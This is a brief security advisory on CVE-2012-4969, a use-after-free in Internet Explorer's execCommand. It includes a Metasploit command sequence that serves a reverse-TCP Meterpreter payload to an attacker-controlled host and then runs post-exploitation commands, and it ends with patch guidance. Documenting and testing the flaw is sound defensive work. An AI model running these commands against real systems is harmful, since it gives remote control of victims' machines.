Remote code execution 0day in the IE execCommand function

CVE-2012-4969

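Description:

A use-after-free in the CMshtmlEd::Exec function in mshtml.dll leads to remote code execution. A remote attacker can execute arbitrary code through a crafted website. It was widely exploited in September 2012.

Affected IE versions: IE6, IE7, IE8, IE9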

MSF test:

use exploit/windows/browser/ie_execcommand_uaf
set SRVHOST 192.168.178.33
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.33
exploit

sysinfo
getuid

Solution:

  1. Install the emergency patch released by Microsoft: patch link
  2. Use another browser, such as Chrome or Firefox

Reference:

http://technet.microsoft.com/en-us/security/advisory/2757760

http://eromang.zataz.com/2012/09/16/zero-day-season-is-really-not-over-yet/
